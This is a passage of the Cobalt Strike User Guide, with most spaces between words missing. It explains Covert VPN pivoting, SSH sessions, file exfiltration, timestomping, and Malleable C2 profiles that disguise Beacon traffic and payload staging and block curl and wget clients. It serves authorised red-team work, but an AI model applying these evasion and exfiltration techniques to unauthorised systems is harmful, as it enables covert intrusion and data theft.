UseifconfigtoconfigureitsIPaddress.IfyourtargetnetworkhasaDHCPserver,youmay requestanIPaddressfromitusingyouroperatingsystemsbuilt-intools. CobaltStrikeUserGuide www.fortra.com page:123
Pivoting/CovertVPN Manage Interfaces TomanageyourCovertVPNinterfaces,gotoCobalt Strike ->VPN Interfaces.Here,Cobalt StrikewillshowtheCovertVPNinterfaces,howthey’reconfigured,andhowmanybyteswere transmittedandreceivedthrougheachinterface. HighlightaninterfaceandpressRemove todestroytheinterfaceandclosetheremoteCovert VPNclient.CovertVPNwillremoveitstemporaryfilesonrebootanditautomaticallyundoes anysystemchangesrightaway. PressAdd toconfigureanewCovertVPNinterface. figure66-SetupaCovertVPNInterface Configure an Interface CovertVPNinterfacesconsistofanetworktapandachanneltocommunicateethernetframes through.Toconfiguretheinterface,chooseanInterfacename(thisiswhatyouwillmanipulate throughifconfiglater)andaMACaddress. YoumustalsoconfiguretheCovertVPNcommunicationchannelforyourinterface.CovertVPN maycommunicateEthernetframesoveraUDPconnection,TCPconnection,ICMP,orusingthe HTTPprotocol.TheTCP(Reverse)channelhasthetargetconnecttoyourCobaltStrike instance.TheTCP(Bind)channelhasCobaltStriketunneltheVPNthroughBeacon. CobaltStrikewillsetupandmanagecommunicationwiththeCovertVPNclientbasedonthe LocalPortandChannelyouselect. TheCovertVPNHTTPchannelmakesuseoftheCobaltStrikewebserver.Youmayhostother CobaltStrikewebapplicationsandmultipleCovertVPNHTTPchannelsonthesameport. CobaltStrikeUserGuide www.fortra.com page:124
Pivoting/CovertVPN Forbestperformance,usetheUDPchannel.TheUDPchannelhastheleastamountof overheadcomparedtotheTCPandHTTPchannels.UsetheICMP,HTTP,orTCP(Bind) channelsifyouneedtogetpastarestrictivefirewall. WhileCovertVPNhasaflexibilityadvantage,youruseofaVPNpivotoveraproxypivotwill dependonthesituation.CovertVPNrequiresAdministratoraccess.Aproxypivotdoesnot. CovertVPNcreatesanewcommunicationchannel.Aproxypivotdoesnot.Youshouldusea proxypivotinitiallyandmovetoaVPNpivotwhenit’sneeded. CobaltStrikeUserGuide www.fortra.com page:125
SSHSessions/TheSSHClient SSH Sessions The SSH Client CobaltStrikecontrolsUNIXtargetswithabuilt-inSSHclient.ThisSSHclientreceivestasks fromandroutesitsoutputthroughaparentBeacon. Right-clickatargetandgotoLogin -> sshtoauthenticatewithausernameandpassword.Go toLogin -> ssh (key)toauthenticatewithakey. FromaBeaconconsole,usessh [pid] [arch] [target] [user] [password]toinjectintothe specifiedprocesstorunanSSHclientandattempttologintothespecifiedtarget.Usessh [target] [user] [password] (without[pid]and[arch]arguments)tospawnatemporaryprocess torunanSSHclientandattempttologintothespecifiedtarget. Youmayalsousessh-key [pid] [arch] [target:port] [user] [/path/to/key.pem]toinjectintothe specifiedprocesstorunanSSHclientandattempttologintothespecifiedtarget.Usessh-key [target:port] [user] /path/to/key.pemtospawna temporaryprocesstorunanSSHclientandattempttologintothespecifiedtarget. NOTE: ThekeyfileneedstobeinthePEMformat.IfthefileisnotinthePEMformatthenmakea copyofthefileandconvertthecopywiththefollowingcommand:/usr/bin/ssh-keygen -f [/path/to/copy] -e -m pem -p. ThesecommandsrunCobaltStrike’sSSHclient.Theclientwillreportanyconnectionor authenticationissuestotheparentBeacon.Iftheconnectionsucceeds,youwillseeanew sessioninCobaltStrike’sdisplay.ThisisanSSHsession.Right-clickonthissessionandpress Interact toopentheSSHconsole. Typehelp toseealistofcommandstheSSHsessionsupports.Typehelpfollowedbya commandnamefordetailsonthatcommand. Running Commands Theshell commandwillrunthecommandandargumentsyouprovide.Runningcommands blocktheSSHsessionforupto20sbeforeCobaltStrikeputsthecommandinthebackground. CobaltStrikewillreportoutputfromtheselongrunningcommandsasitbecomesavailable. Usesudo [password] [command + arguments] toattempttorunacommandviasudo.This aliasrequiresthetarget’ssudotoacceptthe–Sflag. CobaltStrikeUserGuide www.fortra.com page:126
SSHSessions/UploadandDownloadFiles Thecd commandwillchangethecurrentworkingdirectoryfortheSSHsession.Thepwd commandreportsthecurrentworkingdirectory. Upload and Download Files Thefollowingcommandsareavailable: NOTE: Typehelp intheBeaconconsoletoseeavailablecommands.Typehelp followedbya commandnametoseedetailedhelp. download-Thiscommanddownloadstherequestedfile.Youdonotneedtoprovidequotes aroundafilenamewithspacesinit.Beaconisbuiltforlowandslowexfiltrationofdata. Duringeachcheck-in,Beaconwilldownloadafixedchunkofeachfileitstaskedtoget. ThesizeofthischunkdependsonBeacon’scurrentdatachannel.TheHTTPandHTTPS channelspulldatain512KBchunks. downloads-UsetoseealistoffiledownloadsinprogressforthecurrentBeacon. cancel-Issuethiscommand,followedbyafilename,tocanceladownloadthat’sinprogress. Youmayusewildcardswithyourcancelcommandtocancelmultiplefiledownloadsat once. upload-Thiscommanduploadsafiletothehost. timestomp-Whenyouuploadafile,youwillsometimeswanttoupdateitstimestampsto makeitblendinwithotherfilesinthesamefolder.Thiscommandwilldothis.The timestompcommandmatchestheModified,Accessed,andCreatedtimesofonefileto anotherfile. GotoView->DownloadsinCobaltStriketoseethefilesthatyourteamhasdownloadedsofar. Onlycompleteddownloadsshowupinthistab. Downloadedfilesarestoredontheteamserver.Tobringfilesbacktoyoursystem,highlight themhere,andpressSync Files.CobaltStrikethendownloadstheselectedfilestoafolderof yourchoosingonyoursystem. Peer-to-peer C2 SSHsessionscancontrolTCPBeacons.Usetheconnect commandtoassumecontrolofa TCPBeaconwaitingforaconnection.Useunlink todisconnectaTCPBeaconsession. CobaltStrikeUserGuide www.fortra.com page:127
SSHSessions/SOCKSPivotingandReversePortForwards Goto[session] ->Listeners ->Pivot Listener… tosetupapivotlistenertiedtothisSSH session.ThiswillallowthiscompromisedUNIXtargettoreceivereverseTCPBeaconsessions. ThisoptiondoesrequirethattheSSHdaemon’sGatewayPortsoptionissettoyesor ClientSpecified. SOCKS Pivoting and Reverse Port Forwards Thefollowingcommandsareavailable: NOTE: Typehelp intheBeaconconsoletoseeavailablecommands.Typehelp followedbya commandnametoseedetailedhelp. socks-UsethiscommandtocreateaSOCKSserveronyourteamserverthatforwardstraffic throughtheSSHsession.Therportfwd commandwillalsocreateareverseportforward thatroutestrafficthroughtheSSHsessionandyourBeaconchain. Thereisonecaveattorportfwd:therportfwdcommandaskstheSSHdaemontobindtoall interfaces.It’squitelikelytheSSHdaemonwilloverridethisandforcetheporttobindto localhost.YouneedtochangetheGatewayPortsoptionfortheSSHdaemontoyesor clientspecified. CobaltStrikeUserGuide www.fortra.com page:128
MalleableCommandandControl/Overview
Malleable Command and Control
Overview
Beacon'sHTTPindicatorsarecontrolledbyaMalleableCommandandControl(MalleableC2)
profile.AMalleableC2profileisasimpleprogramthatspecifieshowtotransformdataand
storeitinatransaction.Thesameprofilethattransformsandstoresdata,interpreted
backwards,alsoextractsandrecoversdatafromatransaction.
Touseacustomprofile,youmuststartaCobaltStriketeamserverandspecifyyourprofileat
thattime.
./teamserver [external IP] [password] [/path/to/my.profile]
YoumayonlyloadoneprofileperCobaltStrikeinstance.
Viewing the Loaded Profile
ToviewtheC2profilethatwasloadedwhentheTeamServerwasstartedselectHelp
Malleable C2 Profileonthemenu.Thisdisplaystheprofileforthecurrentlyselected
TeamServerwhenmultipleTeamServersareconnected.Thedialogisread-only.
Toclosethedialogusethe'x'intheupperrightcornerofthedialog.
TIP:
ThissectioncoverstheMalleableC2featuresrelatedtoflexiblenetworkcommunications.
SeeMalleable PE, Process Injection, and Post Exploitation on page 151forinformation
onMalleableC2'sstage,process-inject,andpost-exblocks.
Checking for Errors
CobaltStrike’sLinuxpackageincludesac2lint program.Thisprogramwillcheckthesyntaxofa
communicationprofile,applyafewextrachecks,andevenunittestyourprofilewithrandom
data.It’shighlyrecommendedthatyoucheckyourprofileswiththistoolbeforeyouloadthem
intoCobaltStrike.
./c2lint [/path/to/my.profile]
c2lintreturnsandlogsthefollowingresultcodesforthespecifiedprofilefile:
CobaltStrikeUserGuide www.fortra.com page:129
MalleableCommandandControl/ProfileLanguage l Aresultof0isreturnedifc2lintcompleteswithnoerrors l Aresultof1isreturnedifc2lintcompleteswithonlywarnings l Aresultof2isreturnedifc2lintcompleteswithonlyerrors l Aresultof3isreturnedifc2lintcompleteswithbotherrorsandwarnings. Thelastlinesofthec2lintoutputdisplayacountofdetectederrorsandwarnings.Nomessage isdisplayedifnonearefound.Therecanbemoreerrormessagesdisplayedintheoutputthan thecountrepresentsbecauseasingleerrormayproducemorethan1errormessage.Thisis thesamepossibilityforwarningshoweverlesslikely.Forexample: l [!]Detected1warning. l [-]Detected3errors. Profile Language Thebestwaytocreateaprofileistomodifyanexistingone.Severalexampleprofilesare availableonGithub:https://github.com/cobalt-strike/Malleable-C2-Profiles Whenyouopenaprofile,hereiswhatyouwillsee:
this is a comment
set global_option "value"; protocol-transaction { set local_option "value"; client {
customize client indicators
} server {
customize server indicators
} } Commentsbeginwitha#andgountiltheendoftheline.Thesetstatementisawaytoassigna valuetoanoption.Profilesuse{ curlybraces}togroupstatementsandinformationtogether. Statementsalwaysendwithasemi-colon. Tohelpallofthismakesense,here’sapartialprofile: http-get { set uri "/foobar"; CobaltStrikeUserGuide www.fortra.com page:130
MalleableCommandandControl/ProfileLanguage client { metadata { base64; prepend "user="; header "Cookie"; } } ThispartialprofiledefinesindicatorsforanHTTPGETtransaction.Thefirststatement,seturi, assignstheURIthattheclientandserverwillreferenceduringthistransaction.Thisset statementoccursoutsideoftheclientandservercodeblocksbecauseitappliestobothof them. TheclientblockdefinesindicatorsfortheclientthatperformsanHTTPGET.Theclient,inthis case,isCobaltStrike’sBeaconpayload. WhenCobaltStrike’sBeacon“phoneshome”itsendsmetadataaboutitselftoCobaltStrike.In thisprofile,wehavetodefinehowthismetadataisencodedandsentwithourHTTPGET request. Themetadatakeywordfollowedbyagroupofstatementsspecifieshowtotransformand embedmetadataintoourHTTPGETrequest.Thegroupofstatements,followingthemetadata keyword,iscalledadatatransform. Step Action Data 0. Start metadata
- base64 Base64Encode bWV0YWRhdGE=
- prepend"user=" PrependString user=bWV0YWRhdGE=
- header"Cookie" StoreinTransaction Thefirststatementinourdatatransformstatesthatwewillbase64encodeourmetadata[1]. Thesecondstatement,prepend,takesourencodedmetadataandprependsthestringuser=to it[2].Nowourtransformedmetadatais“user=“ .base64(metadata).Thethirdstatementstates wewillstoreourtransformedmetadataintoaclientHTTPheadercalledCookie[3].That’sit. BothBeaconanditsserverconsumeprofiles.Here,we’vereadtheprofilefromtheperspective oftheBeaconclient.TheBeaconserverwilltakethissameinformationandinterpretit backwards.Let’ssayourCobaltStrikewebserverreceivesaGETrequesttotheURI/foobar. Now,itwantstoextractmetadatafromthetransaction. Step Action Data
- Start CobaltStrikeUserGuide www.fortra.com page:131
MalleableCommandandControl/ProfileLanguage Step Action Data
- header"Cookie" RecoverfromTransaction user=bWV0YWRhdGE=
- prepend"user=" Removefirst5characters bWV0YWRhdGE=
- base64 Base64Decode metadata Theheaderstatementwilltellourserverwheretorecoverourtransformedmetadatafrom[1]. TheHTTPservertakescaretoparseheadersfromtheHTTPclientforus.Next,weneedtodeal withtheprependstatement.Torecovertransformeddata,weinterpretprependasremovethe firstXcharacters[2],whereXisthelengthoftheoriginalstringweprepended.Now,allthat’sleft istointerpretthelaststatement,base64.Weusedabase64encodefunctiontotransformthe metadatabefore.Now,weuseabase64decodetorecoverthemetadata[3]. Wewillhavetheoriginalmetadataoncetheprofileinterpreterfinishesexecutingeachofthese inversestatements. Data Transform Language Adatatransformisasequenceofstatementsthattransformandtransmitdata.Thedata transformstatementsare: Statement Action Inverse append"string" Append"string" RemovelastLEN(“string”)characters base64 Base64Encode Base64Decode base64url URL-safeBase64Encode URL-safeBase64Decode mask XOR maskw/randomkey XOR maskw/samerandomkey netbios NetBIOSEncode‘a’ NetBIOSDecode‘a’ netbiosu NetBIOSEncode‘A’ NetBIOSDecode‘A’ prepend"string" Prepend"string" RemovefirstLEN(“string”)characters Adatatransformisacombinationofanynumberofthesestatements,inanyorder.For example,youmaychoosetonetbiosencodethedatatotransmit,prependsomeinformation, andthenbase64encodethewholepackage. Adatatransformalwaysendswithaterminationstatement.Youmayonlyuseonetermination statementinatransform.ThisstatementtellsBeaconanditsserverwhereinthetransactionto storethetransformeddata. Therearefourterminationstatements. CobaltStrikeUserGuide www.fortra.com page:132
MalleableCommandandControl/ProfileLanguage
Statement What
header“header” StoredatainanHTTPheader
parameter“key” StoredatainaURIparameter
print Senddataastransactionbody
uri-append AppendtoURI
TheheaderterminationstatementstorestransformeddatainanHTTPheader.Theparameter
terminationstatementstorestransformeddatainanHTTPparameter.Thisparameteris
alwayssentaspartofURI.Theprintstatementsendstransformeddatainthebodyofthe
transaction.
Theprintstatementistheexpectedterminationstatementforthehttp-get.server.output,http-
post.server.output,andhttp-stager.server.outputblocks.Youmayusetheheader,parameter,
printanduri-appendterminationstatementsfortheotherblocks.
Ifyouuseaheader,parameter,oruri-appendterminationstatementonhttp-post.client.output,
Beaconwillchunkitsresponsestoareasonablelengthtofitintothispartofthetransaction.
Theseblocksandthedatatheysendaredescribedinalatersection.
Strings
Beacon’sProfileLanguageallowsyoutouse“strings”inseveralplaces.Ingeneral,stringsare
interpretedas-is.However,thereareafewspecialvaluesthatyoumayuseinastring:
Value Special Value
“\n” Newlinecharacter
“\r” CarriageReturn
“\t” Tabcharacter
“\u####” Aunicodecharacter
“\x##” Abyte(e.g.,\x41=‘A’)
“\”
Headers and Parameters
Datatransformsareanimportantpartoftheindicatorcustomizationprocess.Theyallowyou
todressupdatathatBeaconmustsendorreceivewitheachtransaction.Youmayadd
extraneousindicatorstoeachtransactiontoo.
CobaltStrikeUserGuide www.fortra.com page:133
MalleableCommandandControl/ProfileLanguage InanHTTPGETorPOSTrequest,theseextraneousindicatorscomeintheformofheadersor parameters.Usetheparameterstatementwithintheclientblocktoaddanarbitraryparameter toanHTTPGETorPOSTtransaction. ThiscodewillforceBeacontoadd?bar=blahtothe/foobarURIwhenitmakesarequest. http-get { client { parameter "bar" "blah"; UsetheheaderstatementwithintheclientorserverblockstoaddanarbitraryHTTPheaderto theclient’srequestorserver’sresponse.Thisheaderstatementaddsanindicatortoput networksecuritymonitoringteamsatease. http-get { server { header "X-Not-Malware" "I promise!"; TheProfileInterpreterwillInterpretyourheaderandparameterstatementsInorder.Thatsaid, theWinINetorWinHTTP(client)andCobaltStrikewebserverhavethefinalsayaboutwherein thetransactiontheseindicatorswillappear. SeeHTTP Host Profiles on page 140forinstructionstoincludecustomizedheadersand parametersforspecifichostnames. Options YoumayconfigureBeacon’sdefaultsthroughtheprofilefile.Therearetwotypesofoptions: globalandlocaloptions.TheglobaloptionschangeaglobalBeaconsetting.Localoptionsare transactionspecific.Youmustsetlocaloptionsintherightcontext.Usethesetstatementtoset anoption. set "sleeptime" "1000"; Hereareafewoptions: Option Context Default Value Changes data_jitter 0 Appendrandom-lengthstring(upto data_jittervalue)tohttp-getandhttp- postserveroutput. CobaltStrikeUserGuide www.fortra.com page:134
MalleableCommandandControl/ProfileLanguage Option Context Default Value Changes headers_remove Comma-separatedlistofHTTPclient headerstoremovefromBeaconC2 host_stage true HostpayloadforstagingoverHTTP, HTTPS,orDNS.Requiredbystagers. jitter 0 Defaultjitterfactor(0-99%) Thispropertycannotbeusedwhenthe sleepoptionisincludedintheprofile. pipename msagent_## DefaultnameofpipetouseforSMB Beacon’speer-to-peercommunication. Each#isreplacedwitharandomhex value. pipename_stager status_## NameofpipetouseforSMBBeacon’s namedpipestager.Each#isreplaced witharandomhexvalue. sample_name MyProfile Thenameofthisprofile(usedinthe IndicatorsofCompromisereport) sleep Defaultsleeptimedefinedaseither: secondsjitter(e.g.'2025') or [n]d[n]h[n]m[n]s[n]j(e.g.'1d13h34m 45s25j') Thispropertycannotbeusedwhenthe sleeptimeandjitteroptionsare includedintheprofile. sleeptime 60000 Defaultsleeptime(inmilliseconds). Thispropertycannotbeusedwhenthe sleepoptionisincludedintheprofile. smb_frame_header PrependheadertoSMBBeacon messages ssh_banner CobaltStrike SSHclientbanner 4.2 ssh_pipename postex_ssh_ NameofpipeforSSHsessions.Each#
isreplacedwitharandomhexvalue.
CobaltStrikeUserGuide www.fortra.com page:135
MalleableCommandandControl/ProfileLanguage Option Context Default Value Changes steal_token_ Blank/0 Setsthedefaultusedbysteal_token access_mask (TOKEN_ALL_ beaconcommandandbsteal_token ACCESS) beaconaggressorscriptcommandfor theOpenProcessTokenfunctions "DesiredAccess". Suggestion:use"11"for"TOKEN_ DUPLICATE|TOKEN_ASSIGN_ PRIMARY|TOKEN_QUERY" tasks_max_size 1048576 Themaximumsize(inbytes)oftask(s) andproxydatathatcanbetransferred throughacommunicationchannelata checkin tasks_proxy_max_ 921600 Themaximumsize(inbytes)ofproxy size datatotransferviathecommunication channelatacheckin. tasks_dns_proxy_ 71680 Themaximumsize(inbytes)ofproxy max_size datatotransferviatheDNS communicationchannelatacheckin. tcp_frame_header PrependheadertoTCPBeacon messages tcp_port 4444 DefaultTCPBeaconlistenport uri http-get, [required TransactionURI http-post option] uri_x86 http-stager x86payloadstageURI uri_x64 http-stager x64payloadstageURI useragent Internet DefaultUser-AgentforHTTPcomms. Explorer (Random) verb http-get, GET,POST HTTPVerbtousefortransaction http-post Withtheurioption,youmayspecifymultipleURIsasaspaceseparatedstring.CobaltStrike’s webserverwillbindalloftheseURIsanditwillassignoneoftheseURIstoeachBeaconhost whentheBeaconstageisbuilt. Eventhoughtheuseragentoptionexists;youmayusetheheaderstatementtooverridethis option. AdditionalConsiderationsfor the'task_' Settings CobaltStrikeUserGuide www.fortra.com page:136
MalleableCommandandControl/ProfileLanguage Thetasks_max_size,tasks_proxy_max_size,andtasks_dns_proxy_max_sizeworktogetherto createadatabuffertobetransferredtobeaconwhenacheckinoccurs.Whenthebeacon checksinitrequestsalistoftasksandproxydatathatisreadytobetransferredtothisbeacon anditschildren.Thedatabufferstartstofillwithtask(s)followedbyproxydatafortheparent beacon.Thenitcontinuesthispatternforeachchildbeaconuntilnomoretasksorproxydatais availableorthetasks_max_sizesettingwillbeexceededbythenexttaskorproxydata. Thetasks_max_sizecontrolsthemaximumsizeinbytesadatabufferfilledwithtasksand proxydatacanbetotransferittobeaconthroughDNS,HTTP,HTTPS,andPeer-to-Peer communicationchannels.Mostofthetimethedefaultsarefine,howeverthereareoccasions whenacustomtaskwillexceedthemaximumsizeandcannotbesent.Forexample,youuse theexecute-assemblywithanexecutablelargerthan1MBinsizeandthefollowingmessageis displayedintheteamserverandbeaconconsoles. [TeamServerConsole] Droppingtaskfor40147050!Tasksizeof1389584bytesisoverthemaxtasksizelimitof 1048576bytes. [BeaconConsole] Tasksizeof1389584bytesisoverthemaxtasksizelimitof1048576bytes. Increasingthetasks_max_sizesettingwillallowthiscustomtasktobesent.However,itwill requirerestartingtheteamserverandgeneratingnewbeaconsasthetasks_max_sizeis patchedintotheconfigurationsettingswhenabeaconisgeneratedandcannotbemodified. Thissettingalsoaffectshowmuchheapmemorybeaconallocatestoprocesstasks. Best Practices: l Determinethelargesttasksizethatwillbesenttoabeacon.Thiscanbedonethrough testingandlookingforthemessageaboveorinvestigatingyourcustom objects (executables,dlls,etc)thatareusedinyourengagements.Oncethisisdeterminedadd someextraspacetothevalue.Usingtheinformationfrom theaboveexampleuse 1572864(1.5MB)asthetasks_max_size.Thereasontohaveextraspaceisbecausea smallertaskmayfollowthelargertasktoreadtheresponse. l Whenthetasks_max_sizevalueisdeterminedupdatethetask_max_sizesettinginyour profileandstarttheteam serverandgenerateyourbeaconartifactstodeployonyour targetsystems. l Ifyourinfrastructurerequiresbeaconsgeneratedfrom otherteam serverstoconnect witheachotherthroughPeer-to-Peercommunicationchannels,thenthissettingshould beupdatedonallteam servers.Otherwise,abeaconwillignorearequestwhenit exceedsitsconfiguredsize. l IfyouareusinganExternaC2listeneranupdatewouldberequiredtosupporttasks_ max_sizelargerthanthedefaultsizeof1MB. CobaltStrikeUserGuide www.fortra.com page:137
MalleableCommandandControl/HTTPStaging Whenexecutingalargetaskavoidqueueingitwithothertasks,especiallyifthisisbeing executedonabeaconusingpeer-to-peercommunicationchannels(SMBandTCP)asitcould bedelayedforseveralcheckinsdependingonthenumberofalreadyqueuedtasksandproxy datatosend.ThereasoniswhenataskisaddedithasasizeofXbyteswhichreducesthetotal availablespaceavailableforaddingadditionaltasks.Inaddition,proxyingdatathrougha beaconwillalsoreducetheamountofavailablespaceforsendingalargetask.Whenataskis delayedthefollowingmessageisdisplayedintheteamserverandbeaconconsoles. [TeamServerConsole] Chunkingtasksfor123!Unabletoaddtaskof787984bytesasitisovertheavailablesizeof 260486bytes.2task(s)onholduntilnextcheckin. [BeaconConsole] Unabletoaddtaskof787984bytesasitisovertheavailablesizeof260486bytes.2task(s) onholduntilnextcheckin. Thetasks_dns_proxy_max_size(DNSchannel)andtasks_proxy_max_size(Otherchannels) controlsthesizeofproxydatainbytestobesenttobeacon.Bothsettingsneedtobelessthan thetasks_max_sizesetting.Itisrecommendednottomodifythesesettingsasthedefaultsizes arefine.Howthesesettingsworkiswhenitistimetoaddproxydatatothedatabufferfora parentbeaconitusesthechannelsproxy_max_sizesettingminusthecurrenttasklength,which canbeeitherapositiveornegativevalue.Ifitisapositivevalue,thentheproxydatawillbe addeduptothatvalue.ifitisanegativevaluetheproxydataisskippedforthischeckin.Fora childbeacontheproxy_max_sizeistemporarilyreducedbasedontheavailabledatabuffer spaceleftfromprocessingtheparentandpriorchildren. HTTP Staging Beaconisastagedpayload.Thismeansthepayloadisdownloadedbyastagerandinjected intomemory.Yourhttp-getandhttp-postindicatorswillnottakeeffectuntilBeaconisin memoryonyourtarget.MalleableC2’shttp-stagerblockcustomizestheHTTPstagingprocess. http-stager { set uri_x86 "/get32.gif"; set uri_x64 "/get64.gif"; Theuri_x86optionsetstheURItodownloadthex86payloadstage.Theuri_x64optionsetsthe URItodownloadthex64payloadstage. client { parameter "id" "1234"; header "Cookie" "SomeValue"; } CobaltStrikeUserGuide www.fortra.com page:138
MalleableCommandandControl/ABeaconHTTPTransactionWalk-through Theclientkeywordunderthecontextofhttp-stagerdefinestheclientsideoftheHTTP transaction.UsetheparameterkeywordtoaddaparametertotheURI.Usetheheaderkeyword toaddaheadertothestager’sHTTPGETrequest. server { header "Content-Type" "image/gif"; output { prepend "GIF89a"; print; } } Theserverkeywordunderthecontextofhttp-stagerdefinestheserversideoftheHTTP transaction.Theheaderkeywordaddsaserverheadertotheserver’sresponse.Theoutput keywordundertheservercontextofhttp-stagerisadatatransformtochangethepayload stage.Thistransformmayonlyprependandappendstringstothestage.Usetheprint terminationstatementtoclosethisoutputblock. ABeacon HTTP Transaction Walk-through Toputallofthistogether,ithelpstoknowwhataBeacontransactionlookslikeandwhichdata issentwitheachrequest. AtransactionstartswhenaBeaconmakesanHTTPGETrequesttoCobaltStrike’swebserver. Atthistime,Beaconmustsendmetadatathatcontainsinformationaboutthecompromised system. TIP: Sessionmetadataisanencryptedblobofdata.Withoutencoding,itisnotsuitablefor transportinaheaderorURIparameter.Alwaysapplyabase64,base64url,ornetbios statementtoencodeyourmetadata. CobaltStrike’swebserverrespondstothisHTTPGETwithtasksthattheBeaconmustexecute. Thesetasksare,initially,sentasoneencryptedbinaryblob.Youmaytransformthisinformation withtheoutputkeywordundertheservercontextofhttp-get. AsBeaconexecutesitstasks,itaccumulatesoutput.Afteralltasksarecomplete,Beacon checksifthereisoutputtosend.Ifthereisnooutput,Beacongoestosleep.Ifthereisoutput, BeaconinitiatesanHTTPPOSTtransaction. TheHTTPPOSTrequestmustcontainasessionidinaURIparameterorheader.CobaltStrike usesthisinformationtoassociatetheoutputwiththerightsession.Thepostedcontentis, CobaltStrikeUserGuide www.fortra.com page:139
MalleableCommandandControl/HTTPHostProfiles initially,anencryptedbinaryblob.Youmaytransformthisinformationwiththeoutputkeyword undertheclientcontextofhttp-post. CobaltStrike’swebservermayrespondtoanHTTPPOSTwithanythingitlikes.Beacondoes notconsumeorusethisinformation.YoumayspecifytheoutputofHTTPPOSTwiththeoutput blockundertheservercontextofhttp-post. NOTE: Whilehttp-getusesGETbydefaultandhttp-postusesPOSTbydefault,you’renotstuck withtheseoptions.Usetheverboptiontochangethesedefaults.There’salotofflexibility here. Thistablesummarizesthesekeywordsandthedatatheysend: Request Component Block Data http-get client metadata Sessionmetadata http-get server output Beacon’stasks http-post client id SessionID http-post client output Beacon’sresponses http-post server output Empty http-stager server output Encodedpayloadstage HTTP Host Profiles HostProfilesisusedtodefineHTTPcharacteristics(uri,headers,andparameters)thatwillbe usedfortheHTTP/HTTPScommunicationtrafficforaspecifichostname.HostProfilesis optional.HostProfilescanbedefinedformultiplehostnames. About Dynamic Data Somefieldsinhttp-host-profilesgroupsupportadynamicvaluesyntax.Beaconswillrandomly selectoneoftheoptionalvaluesinthespecifieddynamicsyntax.Dynamicsyntaxiswrappedby squarebracketswithvaluesseparatedby"|". Feature Example Resolves to [example.abc|sample.def|demo.ghi] example.abc Dynamicsyntaxcanbe sample.def anentirevalue. demo.ghi CobaltStrikeUserGuide www.fortra.com page:140
MalleableCommandandControl/HTTPHostProfiles Feature Example Resolves to prefix/[a|b]/suffix prefix/a/suffix Dynamicsyntaxcanbe prefix/b/suffix embeddedinstatictext. abc/folder[1||3|]/xyz abc/folder1/xyz Dynamicsyntaxcanhave abc/folder/xyz oneormoreblank abc/folder3/xyz optionsasaselected abc/folder/xyz value. [abc|xyz]/[123|456]/ Dynamicsyntaxcanhave [index.html|hello.js|home.jsp] multipledynamicitems. http-host-profiles { profile { set host-name "one.ytrewq.com"; http-get { set uri "/[a|b|c|d]/ytrewq/get.js"; header "ytrewq-header-[a|b|c]" "static-value"; parameter "ytrewq-parameter" "value-[x|y|z]"; parameter "ytrewq-[a|b|c]" "value-[x|y|z]";
Example of param name that will be dropped when it resolves as blank
parameter "[p1|||p4]" "[a|b|c]"; } http-post { set uri "/[a|b|c|d]/ytrewq/[post1|post2|post3|post4].js"; header "ytrewq-header-[a|b|c]" "static-value"; parameter "ytrewq-parameter" "value-[x|y|z]"; parameter "ytrewq-[a|b|c]" "value-[x|y|z]"; parameter "[p1|||p4]" "[a|b|c]"; } } profile { set host-name "two.ytrewq.com"; http-get { set uri "/ytrewq/get/[2|two|dos]/[a|b|c].js"; } http-post { set uri "/ytrewq/post/[2|two|dos]/[a|b|c].js"; } } } Thesettingsare: CobaltStrikeUserGuide www.fortra.com page:141
MalleableCommandandControl/HTTPHostProfiles Field Description host-name Thehost-namefieldisafixedstringthatlinkstheHostProfiletomatching HTTP HostsfieldontheHTTP/HTTPSlistenerdefinitions.Thefieldis requiredandcasesensitive.ItdoesNOTsupportembeddeddynamic [a|b|c] syntax(“ ”). uri l Appliestoprofile.http-get.uriandprofile.http-post.uri. l ResolvedURILength: o GetMaxLength=127 o PostMaxLength=64 l Optional,butwhenspecified,itcannotresolvetoablankvalue. o NOTALLOWED:[/aaa|/bbb||] l Muststartwith“/“. l MustresolvetovalidHTTPURIsyntax. parameter l Appliestoprofile.http-get.uriandprofile.http-post.uri. l Upto10parametersinasingleHostProfileget/postdefinition. l Supportsembeddeddynamicdatasyntaxinthenameandvalue. l If/whenthenameresolvestoablankvalue,theparameterwillbe dropped. l Blankparametervaluesaresupported. header l Appliestoprofile.http-get.uriandprofile.http-post.uri. l Upto10headersinasingleHostProfileget/postdefinition. l Supportsembeddeddynamicdatasyntaxinthenameandvalue. l If/whenthenameresolvestoablankvalue,theheaderwillbe dropped. l If/whenthevalueresolvestoablankvalue,theheaderwillbe dropped. NOTE: Theheaderandparameterfieldsaboveallowhostnamespecificconfigurationinaddition totheheadersandparametersdescribedintheProfileLanguage/HeadersandParameters sectionintheguide. Restrictions CobaltStrikeUserGuide www.fortra.com page:142
MalleableCommandandControl/HTTPServerConfiguration l Upto8hostprofilesusedperlistener/beacon l 1024bytelimitonspaceforallprofilesusedinabeacon(usesmallsimpledefinitionsif possible) l Maximum tokensinadynamicfield:32 Host Profile Linting: l ThelintingprocessDOES NOTincludeHostProfilesettingsinthedefault/variantprofile sampledataitgenerates.Theprocessdoesnotknowwhichhostswillbeassignedto whichlistenersandwhichlistenerswillbeassignedtothedefaultorvariousprofile variantstogeneratetheexamples. l Thelintingprocessincludesseveralchecksforthedefinedhostprofiles. l TheHostProfileget/postURI’smustresolvetouniqueURI’stoidentifyHTTPrequests appropriately.ThelintingfeaturewilltestforpossibleURIcollisions.Lintingdoesnot knowwhichprofilevariantsmightusespecifichostprofiles,sothelintingprocess checksforduplicatesinalargerscope(allvariants)thanmaybeactuallyrequired. l LintingrequirestheprocessresolveeverypotentialURI,andheader/parametername. Complexdynamicdatacanresultinverylargesetsofresults,whichwillimpact performanceandmemory. HTTP Server Configuration Thehttp-configblockhasinfluenceoverallHTTPresponsesservedbyCobaltStrike’sweb server.Here,youmayspecifyadditionalHTTPheadersandtheHTTPheaderorder. http-config { set headers "Date, Server, Content-Length, Keep-Alive, Connection, Content-Type"; header "Server" "Apache"; header "Keep-Alive" "timeout=5, max=100"; header "Connection" "Keep-Alive”; set trust_x_forwarded_for "true"; set block_useragents "curl*,lynx*,wget*"; } set headers-ThisoptionspecifiestheordertheseHTTPheadersaredeliveredinanHTTP response.Anyheadersnotinthislistareaddedtotheend. header-ThiskeywordaddsaheadervaluetoeachofCobaltStrike’sHTTPresponses.Ifthe headervalueisalreadydefinedinaresponse,thisvalueisignored. CobaltStrikeUserGuide www.fortra.com page:143
